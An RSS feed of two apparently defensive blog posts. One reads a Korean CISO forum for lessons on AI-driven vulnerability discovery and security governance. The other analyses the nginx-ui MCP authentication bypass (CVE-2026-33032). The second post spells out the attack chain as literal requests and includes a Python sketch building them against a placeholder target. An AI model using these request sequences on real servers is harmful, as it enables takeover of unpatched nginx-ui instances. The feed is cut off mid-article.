<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: 김형운</title>
    <description>The latest articles on DEV Community by 김형운 (@silask).</description>
    <link>https://dev.to/silask</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3871305%2Fc7a578c2-b278-4e27-b55a-6c2860c6ea6d.png</url>
      <title>DEV Community: 김형운</title>
      <link>https://dev.to/silask</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/silask"/>
    <language>en</language>
    <item>
      <title>Mythos and the Defender Time That Vanished</title>
      <dc:creator>김형운</dc:creator>
      <pubDate>Tue, 28 Apr 2026 15:51:57 +0000</pubDate>
      <link>https://dev.to/silask/mythos-and-the-defender-time-that-vanished-2kmg</link>
      <guid>https://dev.to/silask/mythos-and-the-defender-time-that-vanished-2kmg</guid>
      <description>&lt;p&gt;On April 7, 2026, Anthropic released Claude Mythos Preview into Project Glasswing, a limited-access program. Twelve launch partners — AWS, Apple, Broadcom, Cisco, CrowdStrike, Google, JPMorgan Chase, Linux Foundation, Microsoft, NVIDIA, Palo Alto Networks, and Anthropic — got first access, with 40+ additional organizations behind them. No Korean firm appears on the list.&lt;/p&gt;

&lt;p&gt;In Anthropic's own evaluations, Mythos autonomously found thousands of zero-day vulnerabilities across every major operating system and web browser, including a 27-year-old integer overflow in OpenBSD's TCP SACK implementation. It produced a working proof-of-concept on the first attempt 83.1% of the time. Anthropic called the model "too powerful to release publicly" and held it back from general availability.&lt;/p&gt;

&lt;p&gt;Sixteen days later, on April 23, Korean CISOs gathered at the 2026 CISO Insight Forum. This piece reads the Forum for the structural shifts it surfaced, organized around the changes themselves rather than the speaking order.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. Two things Mythos changed
&lt;/h2&gt;

&lt;p&gt;Traditional vulnerability discovery had three steps. &lt;strong&gt;Discovery&lt;/strong&gt; of a candidate flaw. &lt;strong&gt;Validation&lt;/strong&gt; that it's real. &lt;strong&gt;Exploitation&lt;/strong&gt; — building a working PoC. Each step needed different people, different tools, different context. The friction between them was the defender's grace period.&lt;/p&gt;

&lt;p&gt;Mythos collapses all three into a single agentic loop. The published scaffold is minimal: an isolated container with no internet, the target source code inside, a one-paragraph prompt asking the model to find a security vulnerability. Then you let it run. The model reads code, hypothesizes, executes the program to confirm, drops into a debugger, and outputs a bug report with a working PoC.&lt;/p&gt;

&lt;p&gt;Two things changed here.&lt;/p&gt;

&lt;p&gt;One, &lt;strong&gt;the human time between discovery and exploit is gone&lt;/strong&gt;. Time cost was tied to human salary and human learning curves. Defender patch windows were sized against that friction. Remove the friction and the patch SLA needs a new unit of measure.&lt;/p&gt;

&lt;p&gt;Two, &lt;strong&gt;the cost floor for attacks collapsed&lt;/strong&gt;. Anthropic's published numbers put 1,000 OpenBSD scans at under $20,000. For comparison: a 2025 enterprise penetration test runs $10K–$35K. So one pentest's budget covered 1,000 sweeps of a single major OS. Run the same math against every major open-source project and the picture writes itself. Risk models that assumed "attacks are expensive" need to be redrawn.&lt;/p&gt;
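&lt;p&gt;As a sanity check on that math (the figures are the ones quoted above; the per-scan unit cost is derived from them, not separately published):&lt;/p&gt;

```python
# Back-of-envelope on the published numbers quoted above.
scan_budget_usd = 20_000      # stated ceiling for 1,000 OpenBSD scans
scans = 1_000
cost_per_scan = scan_budget_usd / scans   # derived: $20 per full-OS sweep

pentest_low, pentest_high = 10_000, 35_000  # 2025 enterprise pentest range

# How many model-driven sweeps one human pentest's budget buys
sweeps_per_pentest_low = pentest_low // cost_per_scan
sweeps_per_pentest_high = pentest_high // cost_per_scan

print(cost_per_scan)              # 20.0
print(sweeps_per_pentest_low)     # 500.0
print(sweeps_per_pentest_high)    # 1750.0
```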

&lt;p&gt;The same capability serves defenders, but almost no Korean CISO has access to a Mythos-grade tool. &lt;strong&gt;Capability arrives at attackers first and at defenders later.&lt;/strong&gt; That asymmetry is policy, not technology.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. Korean AI policies sit on top of Generation 1
&lt;/h2&gt;

&lt;p&gt;Korean enterprises spent the last 18 months drafting AI usage policies that assume Generation 1 — the user asks, the model answers. "Review AI-generated content before sending." "Don't paste customer data into ChatGPT." Rules built on top of single-shot Q&amp;amp;A.&lt;/p&gt;

&lt;p&gt;That isn't where AI is going. Generation 2 is agentic execution: the user states a goal, the model plans and acts. Vibe coding lives here. Generation 3 is multi-agent: a high-level objective, agents talking to other agents to produce results.&lt;/p&gt;

&lt;p&gt;Generation 3 can't be governed by Generation 1 rules. By the time a human is in the loop, dozens of agent decisions have already happened. &lt;strong&gt;Auditing what an agent did becomes a forensic problem, not a real-time control problem.&lt;/strong&gt; That requires agent activity logs at a granularity most organizations don't have. Korean enterprises included.&lt;/p&gt;

&lt;p&gt;There's a trade-off. Companies that block Generation 3 lose the productivity race. Companies that adopt it without audit infrastructure lose the compliance race. There's no middle path without new tooling.&lt;/p&gt;

&lt;p&gt;Vibe coding produces a parallel rule. &lt;strong&gt;Don't hand-edit AI-generated code.&lt;/strong&gt; The moment you do, the agent's context breaks. The next agent edit lands on top of your edit and the code degrades faster. Push corrections back through the agent. That's a real shift in what code review means, and most security teams haven't internalized it yet.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F14d54o0qwztq9nwiqki2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F14d54o0qwztq9nwiqki2.png" alt="Policy parked at Generation 1 while real usage covers Gen 2 and Gen 3" width="800" height="467"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  3. The unit of attack surface has changed
&lt;/h2&gt;

&lt;p&gt;Frontier models now process text, audio, video, documents, meeting recordings — all in a single pass. The change that creates is a change of unit.&lt;/p&gt;

&lt;p&gt;Thinking about attack surface in units of "this codebase" or "this document" no longer holds. The new unit is &lt;strong&gt;everything that flows into a single model invocation&lt;/strong&gt;, regardless of where that data physically sits. If it's in the same session, it's in the same exposure.&lt;/p&gt;

&lt;p&gt;There's another trade-off here. Restrict context and you restrict your own analysts' capacity. Mythos-grade vulnerability discovery doesn't work without the model reading a full codebase in context. The same property creates the offensive risk and the defensive capability. The right move isn't input restriction, it's &lt;strong&gt;logged exposure with scoped controls&lt;/strong&gt; — knowing which data went into which model call.&lt;/p&gt;

&lt;p&gt;Shadow AI deepens this problem. SBOMs run on the assumption that you know what software is running inside the company. Shadow AI breaks that assumption a level deeper than shadow IT ever did. An employee uses ChatGPT or Claude through a personal account on a personal device, then pastes the output into work systems. The "tool" never touches the corporate network.&lt;/p&gt;

&lt;p&gt;So the control point has to move. Not "what tools are employees allowed to use," but &lt;strong&gt;"what data are they allowed to handle"&lt;/strong&gt;. That's an HR and labor-policy problem before it's a technical one.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Board reporting is now a legal requirement, and translation doesn't carry the room
&lt;/h2&gt;

&lt;p&gt;In 2026, Korean law moves board-level security reporting from "good practice" to "legally required." Three changes drive it. The &lt;strong&gt;Personal Information Protection Act&lt;/strong&gt; now requires CPO appointment and dismissal to go through the board, and adds a board reporting obligation for privacy posture. The &lt;strong&gt;Information &amp;amp; Communications Network Act&lt;/strong&gt; adds a parallel reporting obligation for information protection status. The &lt;strong&gt;Electronic Financial Supervisory Regulation&lt;/strong&gt; is already in force — CISO must report to the board, not just the CEO.&lt;/p&gt;

&lt;p&gt;Press will summarize this as "CISOs must now report to boards." True and uninteresting. The interesting question is &lt;em&gt;why most CISOs will fail at this reporting&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;CISOs typically prepare for a board session by translating technical material into accessible language. That doesn't work. Korean corporate boards are dominated by lawyers and business-school graduates. Technical risk language — CVEs, attack surfaces, MITRE ATT&amp;amp;CK matrices — doesn't land. The failure isn't poor translation; the translation attempt itself wastes the slot.&lt;/p&gt;

&lt;p&gt;Start in business language. Boards want four data points.&lt;/p&gt;

&lt;p&gt;One — &lt;strong&gt;risk in monetary terms&lt;/strong&gt;. Not CVSS scores. The expected loss from an unpatched exposure if it becomes an incident.&lt;/p&gt;

&lt;p&gt;Two — &lt;strong&gt;maturity against a recognized standard&lt;/strong&gt;. NIST CSF, Zero Trust framework levels. "We're at level 2 of 4."&lt;/p&gt;

&lt;p&gt;Three — &lt;strong&gt;compliance posture&lt;/strong&gt;. PIPA, GDPR, Network Act — exposure to penalties under current and pending regulation.&lt;/p&gt;

&lt;p&gt;Four — &lt;strong&gt;supply-chain risk&lt;/strong&gt;. Most modern breaches enter through supply chain. Boards have started asking about it.&lt;/p&gt;
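&lt;p&gt;Point one is the one most teams have no machinery for. A minimal sketch of "risk in monetary terms," using the standard annualized-loss-expectancy model; every figure below is an illustrative placeholder, not Forum data:&lt;/p&gt;

```python
# Standard annualized-loss-expectancy model: ALE = SLE x ARO.
# All numbers are illustrative placeholders.

def annualized_loss(single_loss_won: float, annual_rate: float) -> float:
    """Expected yearly loss: single-incident impact x expected incidents per year."""
    return single_loss_won * annual_rate

# An unpatched internet-facing exposure, with made-up inputs:
sle = 2_000_000_000   # KRW 2B if the exposure becomes an incident
aro = 0.15            # roughly one incident every 6-7 years at current posture

ale = annualized_loss(sle, aro)
print(f"{ale:,.0f} KRW/year")   # 300,000,000 KRW/year
```

The board-facing number is the output, not the inputs: the inputs are the CISO's defensible estimates, and arguing about them is the conversation the slot is for.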

&lt;p&gt;ISMS-P certification is the first thing Korean CISOs reach for to show the board "we're handling this." But ISMS-P was designed as an operational compliance standard, not a board communication tool. It shows whether you're patching things. It doesn't show whether your unpatched exposure is worth ₩100M or ₩10B in expected loss. The board needs the second number. ISMS-P doesn't produce it.&lt;/p&gt;

&lt;p&gt;A quantitative risk model has to layer on top of ISMS-P, not replace it. The direction is right, the operational lift is real, and most Korean CISOs haven't started.&lt;/p&gt;

&lt;p&gt;One more thing. Secure your allies before the formal board meeting. Pre-meetings with the CFO and one or two friendly outside directors aren't optional. The actual board session is the wrong place to surface a controversial finding. The right place is the prep meeting, where you can lose without losing publicly. Has nothing to do with security and everything to do with surviving as a CISO long enough to do the security work.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. Disclosure, repurposed as competitive pressure
&lt;/h2&gt;

&lt;p&gt;Korea's information protection disclosure regime makes four things public and audited: information protection investment, workforce composition, certifications held, security activities. Most CISOs skim this regime because it looks administrative. Mistake.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;In 2024, the law added post-hoc verification authority&lt;/strong&gt; — the regulator can now check what was disclosed. Before that, filings were essentially what companies wrote. Now they aren't.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Then in 2027, the exclusion thresholds disappear.&lt;/strong&gt; Companies that had been below the cutoff start filing.&lt;/p&gt;

&lt;p&gt;Once filings are public and compared year over year, &lt;strong&gt;competitive pressure replaces regulatory pressure as the primary driver&lt;/strong&gt;. A peer in your sector with a higher security investment ratio shows up in a filing that customers and audit committees both read. Annually. Compared to last year's, and compared to peers.&lt;/p&gt;

&lt;p&gt;That shifts the political center of gravity inside the company. Security budget stops being a fight for IT-spend share and becomes a question of where you sit on a public benchmark. The CISO suddenly holds a number the CFO has to defend externally. ISMS-P certification status sits in the public artifact. The certification stops being something you renew quietly every three years and becomes something the market reads.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Dynamic access control — externalizing tacit knowledge
&lt;/h2&gt;

&lt;p&gt;The shifts above all push the same question at operators: &lt;em&gt;what can you actually do today, without Mythos-grade tooling?&lt;/em&gt; The Forum's most operationally specific answer was dynamic access control.&lt;/p&gt;

&lt;p&gt;Korean enterprise access controls have been binary. You have permission or you don't. Employees who need access to personal information get exception-permissions, and those exceptions stay open.&lt;/p&gt;

&lt;p&gt;Revalidating those exceptions dynamically is the alternative. Examples: a privileged user who accesses the same data over VPN gets masked output instead of raw records. A VPN source IP that maps to a less-trusted endpoint adds another negative signal. A DBA whose badge-in record isn't in the system this morning has their DB access suspended.&lt;/p&gt;
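&lt;p&gt;The revalidation logic above can be sketched as a single decision function. Signal names and the decision table are invented for illustration, not any vendor's API:&lt;/p&gt;

```python
# Hedged sketch of dynamic revalidation: operational signals (badge-in,
# VPN source, endpoint trust) feed every authorization decision. The
# signal names and rules are illustrative only.

def authorize(request: dict) -> str:
    """Return 'allow', 'mask', or 'suspend' for a data-access request."""
    # A DBA with no badge-in record today loses DB access outright.
    if request["role"] == "dba" and not request["badged_in_today"]:
        return "suspend"
    # Privileged access over VPN gets masked output instead of raw data.
    if request["privileged"] and request["via_vpn"]:
        return "mask"
    # A VPN source IP mapped to a less-trusted endpoint is another
    # negative signal; degrade the response rather than deny it.
    if request["via_vpn"] and not request["endpoint_trusted"]:
        return "mask"
    return "allow"

decision = authorize({
    "role": "dba", "badged_in_today": False,
    "privileged": True, "via_vpn": False, "endpoint_trusted": True,
})
print(decision)  # suspend
```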

&lt;p&gt;What makes this interesting is the choice of signals. &lt;strong&gt;Operational signals nobody else queries&lt;/strong&gt; — badge-in records, IP reputation deltas, peer behavior baselines — get pulled into authorization decisions. Familiar territory in zero-trust literature, but the implementation cues are different.&lt;/p&gt;

&lt;p&gt;There's a deeper point underneath. The "abnormal" in anomaly detection mostly lives as tacit knowledge in CISOs' heads. "User X is sketchy" is a judgment that doesn't sit in any system. The dynamic control project is about &lt;strong&gt;externalizing that tacit knowledge into systematic signals&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;This is harder than it looks. The moment a rule is formalized, it becomes gameable. Anyone trying to evade just routes around it. But the direction is right. Without formalizing and systematizing the concept of "abnormal," dynamic control doesn't actually run.&lt;/p&gt;

&lt;p&gt;The same principle applies to pre-launch security review. Business teams skip it. There's a limit to how much you can prevent that. When skipping happens, run a post-implementation review. Document the gaps. List them. Escalate to executives. Preserve the paper trail. &lt;strong&gt;Not a control that prevents the skip. A control that ensures responsibility lands in the right place when a skip turns into an incident.&lt;/strong&gt; Honest, and operationally workable.&lt;/p&gt;

&lt;p&gt;This is the operational answer to "AI defense requires AI." Pattern-based security tools were built around static signatures. Post-Mythos attacks are context-driven — they reason, they chain. The only thing fast enough to defend against context-driven attacks is something that reasons in context. That's an AI system. Which is why AI security teams need dedicated personnel — not a generalist who also covers AI, but a specialist whose job is the AI defense layer.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wlc9ndw7o9s99kunff2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wlc9ndw7o9s99kunff2.png" alt="Tacit " width="800" height="467"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  7. The asymmetry Korea is facing
&lt;/h2&gt;

&lt;p&gt;One gap to close on.&lt;/p&gt;

&lt;p&gt;Mythos exists. Glasswing exists. AWS, Microsoft, Google, NVIDIA, Palo Alto Networks have access. No Korean firm is on the list.&lt;/p&gt;

&lt;p&gt;The implicit assumption running through every Forum discussion was that Korean CISOs need to &lt;em&gt;prepare for&lt;/em&gt; AI-driven attacks. The honest framing is that Korean CISOs need to prepare for AI-driven attacks &lt;strong&gt;without&lt;/strong&gt; access to AI-driven defense at the same tier. The asymmetry is structural. By the time Mythos-equivalent capability is commercially available in Korea, the same capability will have been in adversarial hands for some time.&lt;/p&gt;

&lt;p&gt;That's the conversation the Forum didn't have. Also the most important one. The threat model, the board reporting mandate, the disclosure regime, the dynamic controls — all correct, all important. None of them resolve the asymmetry.&lt;/p&gt;

&lt;p&gt;Three directions might shrink it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Domestic security AI tooling&lt;/strong&gt; — built defensively, designed for Korean compliance and Korean-language constraints. There's a view that the government's foundation-model push lost some strategic urgency post-Mythos. There's a case for re-pointing the goal — from "sovereign model" to "defensive AI."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Open-source defensive tooling&lt;/strong&gt; — the Linux Foundation sits in the Glasswing launch partner list, which matters. Korean CISOs should track these projects actively rather than wait for vendor productization.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Operational discipline that doesn't need Mythos-grade tooling&lt;/strong&gt; — dynamic access control is the example. Achievable today with existing infrastructure plus better signal integration.&lt;/p&gt;

&lt;p&gt;The CISO's job in 2026 isn't to wait for Mythos-grade defense to land in Korea. It's to do everything that doesn't require it, and to prepare the ground for absorbing it the moment it arrives. That's a shorter list than people think. The Forum's value was in mapping it.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>ai</category>
      <category>infosec</category>
      <category>governance</category>
    </item>
    <item>
      <title>nginx-ui's MCP endpoint shipped with 'empty allowlist equals allow-all' — and that's the story worth sitting with</title>
      <dc:creator>김형운</dc:creator>
      <pubDate>Mon, 27 Apr 2026 03:38:19 +0000</pubDate>
      <link>https://dev.to/silask/nginx-uis-mcp-endpoint-shipped-with-empty-allowlist-equals-allow-all-and-thats-the-story-5fee</link>
      <guid>https://dev.to/silask/nginx-uis-mcp-endpoint-shipped-with-empty-allowlist-equals-allow-all-and-thats-the-story-5fee</guid>
      <description>&lt;h2&gt;
  
  
  What happened
&lt;/h2&gt;

&lt;p&gt;On 2026-03-15, the nginx-ui maintainers released version 2.3.4. The release fixed a missing authentication check on a single HTTP endpoint. That endpoint is &lt;code&gt;/mcp_message&lt;/code&gt;, the delivery path for the Model Context Protocol integration the project had added to let AI tools manage nginx configurations.&lt;/p&gt;

&lt;p&gt;The advisory describes the shape of the problem in one paragraph. "The nginx-ui MCP (Model Context Protocol) integration exposes two HTTP endpoints: &lt;code&gt;/mcp&lt;/code&gt; and &lt;code&gt;/mcp_message&lt;/code&gt;. While &lt;code&gt;/mcp&lt;/code&gt; requires both IP whitelisting and authentication (&lt;code&gt;AuthRequired()&lt;/code&gt; middleware), the &lt;code&gt;/mcp_message&lt;/code&gt; endpoint only applies IP whitelisting — and the default IP whitelist is empty, which the middleware treats as 'allow all'."&lt;/p&gt;

&lt;p&gt;The consequence, in the advisory's own words, is that "any network attacker can invoke all MCP tools without authentication, including restarting nginx, creating/modifying/deleting nginx configuration files, and triggering automatic config reloads — achieving complete nginx service takeover."&lt;/p&gt;

&lt;p&gt;The CVE is CVE-2026-33032, CVSS 9.8, class: missing authentication. The finder is Yotam Perkal of Pluto Security, who published a technical writeup alongside the fix and codenamed the bug "MCPwn."&lt;/p&gt;

&lt;h2&gt;
  
  
  What's Confirmed vs. Reported vs. Claimed
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Confirmed&lt;/strong&gt; (primary source or NVD record):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The two endpoints, the middleware mismatch, and the "empty allowlist equals allow-all" default — all direct from the maintainers' advisory.&lt;/li&gt;
&lt;li&gt;CVSS 9.8. Missing-authentication class.&lt;/li&gt;
&lt;li&gt;Fix released in version 2.3.4 on 2026-03-15.&lt;/li&gt;
&lt;li&gt;Workarounds: add &lt;code&gt;middleware.AuthRequired()&lt;/code&gt; to &lt;code&gt;/mcp_message&lt;/code&gt;, or change the IP allowlist default to deny-all.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Reported&lt;/strong&gt; (multiple independent secondary outlets — The Hacker News, Security Affairs, Rapid7):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Exploitation in the wild since March 2026, per Recorded Future's 2026-04-13 report cited by Rapid7.&lt;/li&gt;
&lt;li&gt;Chaining with CVE-2026-27944 (CVSS 9.8, an unauthenticated information-leak on &lt;code&gt;/api/backup&lt;/code&gt; that exposes the &lt;code&gt;node_secret&lt;/code&gt; required to open a session on &lt;code&gt;/mcp&lt;/code&gt;). Fixed in 2.3.3.&lt;/li&gt;
&lt;li&gt;Approximately 2,600 publicly reachable nginx-ui instances per Pluto Security's scan, ~2,689 per Shodan data cited by The Hacker News, with most located in China, the U.S., Indonesia, Germany, and Hong Kong. These are exposure counts, not compromise counts.&lt;/li&gt;
&lt;li&gt;Affected-version reporting is inconsistent across advisories: the finder's blog lists ≤ 2.3.3 as vulnerable; the NVD record lists ≤ 2.3.5. Rapid7 recommends updating to 2.3.6 to avoid the ambiguity.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Claimed&lt;/strong&gt; (single-source, explicitly attributed):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Perkal's structural explanation: "When you bolt MCP onto an existing application, the MCP endpoints inherit the application's full capabilities but not necessarily its security controls. The result is a backdoor that bypasses every authentication mechanism the application was carefully built with." This is his quote, and we cite it as his.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The chain, step by step
&lt;/h2&gt;

&lt;p&gt;Only the hops the sources actually describe.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1 — Leak the &lt;code&gt;node_secret&lt;/code&gt;.&lt;/strong&gt; The attacker issues an unauthenticated request to &lt;code&gt;/api/backup&lt;/code&gt;. On nginx-ui versions before 2.3.3, that endpoint returns enough information to recover the &lt;code&gt;node_secret&lt;/code&gt; value, the query parameter that authenticates the MCP interface. This step is CVE-2026-27944, reported by The Hacker News and Rapid7 as being chained in active exploitation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2 — Open the MCP session.&lt;/strong&gt; The attacker issues &lt;code&gt;GET /mcp?node_secret=xxx&lt;/code&gt; to establish a server-sent-events session and receive a &lt;code&gt;sessionId&lt;/code&gt;. The advisory confirms this endpoint is protected by both IP allowlist and &lt;code&gt;AuthRequired()&lt;/code&gt;. The &lt;code&gt;node_secret&lt;/code&gt; obtained in step 1 satisfies the auth side; the empty-allowlist default satisfies the network side.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3 — Invoke tools on &lt;code&gt;/mcp_message&lt;/code&gt;.&lt;/strong&gt; The attacker issues &lt;code&gt;POST /mcp_message?sessionId=xxx&lt;/code&gt; carrying the tool-invocation payload. No &lt;code&gt;node_secret&lt;/code&gt;, no JWT, no cookies. Because &lt;code&gt;/mcp_message&lt;/code&gt; is only gated by the same empty allowlist, the request is accepted. Per the advisory, the invocable tools include restarting nginx, creating / modifying / deleting configuration files, and triggering automatic reloads.&lt;/p&gt;

&lt;p&gt;Two HTTP requests in total, if the attacker already holds the &lt;code&gt;node_secret&lt;/code&gt;. Three, if they also have to chain the backup leak.&lt;/p&gt;
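&lt;p&gt;The three hops can be written down as the literal requests involved. The paths and parameter names come from the advisory; the secret, session, and tool-call values are placeholders, and the sketch builds the requests as data only, with no network I/O:&lt;/p&gt;

```python
# The chain as data. Placeholder values throughout; the tool name in
# step 3 is hypothetical (the advisory lists capabilities, not tool names).

def build_chain(host: str, node_secret: str, session_id: str) -> list:
    return [
        # Step 1: unauthenticated info leak (CVE-2026-27944, pre-2.3.3)
        ("GET", f"http://{host}/api/backup", None),
        # Step 2: open the SSE session; node_secret satisfies AuthRequired(),
        # the empty default allowlist satisfies the network check
        ("GET", f"http://{host}/mcp?node_secret={node_secret}", None),
        # Step 3: invoke tools. No secret, no JWT, no cookie; only the
        # empty allowlist gates this endpoint on vulnerable versions.
        ("POST", f"http://{host}/mcp_message?sessionId={session_id}",
         '{"method": "tools/call", "params": {"name": "restart_nginx"}}'),
    ]

for method, url, body in build_chain("target.example", "SECRET", "SESSION"):
    print(method, url)
```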

&lt;h2&gt;
  
  
  The broken assumption
&lt;/h2&gt;

&lt;p&gt;The design intent reads well. Two endpoints, both behind &lt;code&gt;AuthRequired()&lt;/code&gt; in intent, both behind an IP allowlist. Defense in depth. What shipped was different.&lt;/p&gt;

&lt;p&gt;Two separate assumptions failed together.&lt;/p&gt;

&lt;p&gt;The first failed assumption is that every privileged endpoint in a family would be wired to the same authentication middleware. &lt;code&gt;/mcp&lt;/code&gt; was. &lt;code&gt;/mcp_message&lt;/code&gt; was not. One line of code separated "authenticated" from "unauthenticated," and that line was absent for the endpoint that carried the write operations. Security Affairs notes that the 2.3.4 fix added that missing line and a regression test so the same kind of omission cannot silently recur.&lt;/p&gt;

&lt;p&gt;The second failed assumption is that the IP allowlist would be meaningful at runtime. The allowlist's default was empty. The middleware treated empty as allow-all. So the network control that was supposed to sit beneath the authentication control sat at zero as well. Two defenses, both disabled at their defaults, on the same endpoint.&lt;/p&gt;
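&lt;p&gt;The shipped allowlist semantics are easy to model. The real implementation is Go; this is an illustrative reconstruction of the behavior the advisory describes, not the project's code:&lt;/p&gt;

```python
# Illustrative model of the allowlist check the advisory describes.

def ip_allowed_shipped(client_ip: str, allowlist: list) -> bool:
    """The shipped behavior: an empty allowlist admits everyone."""
    if not allowlist:        # empty == allow-all: the failed assumption
        return True
    return client_ip in allowlist

# With the default (empty) allowlist, the only gate on /mcp_message is off:
print(ip_allowed_shipped("203.0.113.7", []))            # True - stranger admitted
print(ip_allowed_shipped("203.0.113.7", ["10.0.0.5"]))  # False
```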

&lt;p&gt;Neither assumption is unique to this project. Both describe the general shape of what happens when MCP — a protocol whose value is that AI tools can drive application internals — is added to an application that already has authentication, but whose authentication is wired by convention rather than by a single enforcement point.&lt;/p&gt;

&lt;p&gt;Perkal states the structural version of this directly: "the MCP endpoints inherit the application's full capabilities but not necessarily its security controls." Treat that as his claim, not ours. But the class of failure matches what the advisory says happened here.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why detection gets harder
&lt;/h2&gt;

&lt;p&gt;The exposed surface is a management UI that normally sits in an internal or administrative network. The exploit uses two HTTP requests that look, on the wire, like the product's own MCP traffic. There is no malware signature. There is no credential stuffing pattern. A defender watching authentication logs sees a successful session. A defender watching network logs sees traffic to the product's own ports.&lt;/p&gt;

&lt;p&gt;The only reliable detection signal is the one the application itself would have to produce: "this &lt;code&gt;/mcp_message&lt;/code&gt; invocation was served without a verified identity." On a vulnerable version, that signal does not exist, because the endpoint does not check for identity. Detection has to shift to the outside — to whether the &lt;code&gt;/mcp_message&lt;/code&gt; endpoint is reachable from the network at all, and whether the config-change events it produces are consistent with the change-management trail your operators expect.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to check this week
&lt;/h2&gt;

&lt;p&gt;Operational, in priority order.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Inventory nginx-ui deployments.&lt;/strong&gt; Run an internal scan for port 9000 and any known nginx-ui hostnames. The Shodan-derived public-surface count is ~2,600; your internal surface is typically larger.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Patch status.&lt;/strong&gt; If any instance is at 2.3.3 or earlier, the &lt;code&gt;/api/backup&lt;/code&gt; information leak (CVE-2026-27944) is usable to harvest the &lt;code&gt;node_secret&lt;/code&gt;. If any instance is at 2.3.4 or earlier per the NVD record's stated coverage (≤ 2.3.5), treat it as exposed to CVE-2026-33032. Rapid7's guidance to go straight to 2.3.6 is the cleanest way to eliminate the version-number ambiguity.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exposure cutoff.&lt;/strong&gt; Confirm the management interface is not reachable from any network segment that carries untrusted users. If the workaround path is the only option, change the IP allowlist default from empty to an explicit deny-all, and add &lt;code&gt;middleware.AuthRequired()&lt;/code&gt; to &lt;code&gt;/mcp_message&lt;/code&gt; per the advisory.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Change audit on managed nginx configs.&lt;/strong&gt; Compare the on-disk nginx config files against the last known-good revision. An attacker who succeeded would leave their signal there, not in the UI logs. Pay attention to any additions that introduce new &lt;code&gt;proxy_pass&lt;/code&gt; targets, new upstream blocks, or new &lt;code&gt;log_format&lt;/code&gt; definitions that could capture credentials.&lt;/li&gt;
&lt;/ol&gt;
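&lt;p&gt;The version logic in item 2 is fiddly enough to be worth encoding. A triage sketch using only the boundaries quoted in this post (pre-2.3.3 also leaks the secret, the NVD record's coverage runs to 2.3.5, Rapid7 says go straight to 2.3.6):&lt;/p&gt;

```python
# Triage helper for item 2. Version boundaries are the ones quoted above.

def parse(v: str) -> tuple:
    return tuple(int(x) for x in v.split("."))

def triage(version: str) -> str:
    v = parse(version)
    # max(v, t) == t is equivalent to "v is at or below t"
    if max(v, parse("2.3.3")) == parse("2.3.3"):
        return "CRITICAL: secret leak + unauth MCP; update to 2.3.6"
    if max(v, parse("2.3.5")) == parse("2.3.5"):
        return "EXPOSED per NVD coverage; update to 2.3.6"
    return "not in the stated vulnerable ranges"

print(triage("2.3.2"))   # CRITICAL: secret leak + unauth MCP; update to 2.3.6
print(triage("2.3.4"))   # EXPOSED per NVD coverage; update to 2.3.6
print(triage("2.3.6"))   # not in the stated vulnerable ranges
```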

&lt;h2&gt;
  
  
  What to change in policy
&lt;/h2&gt;

&lt;p&gt;One policy change has high leverage.&lt;/p&gt;

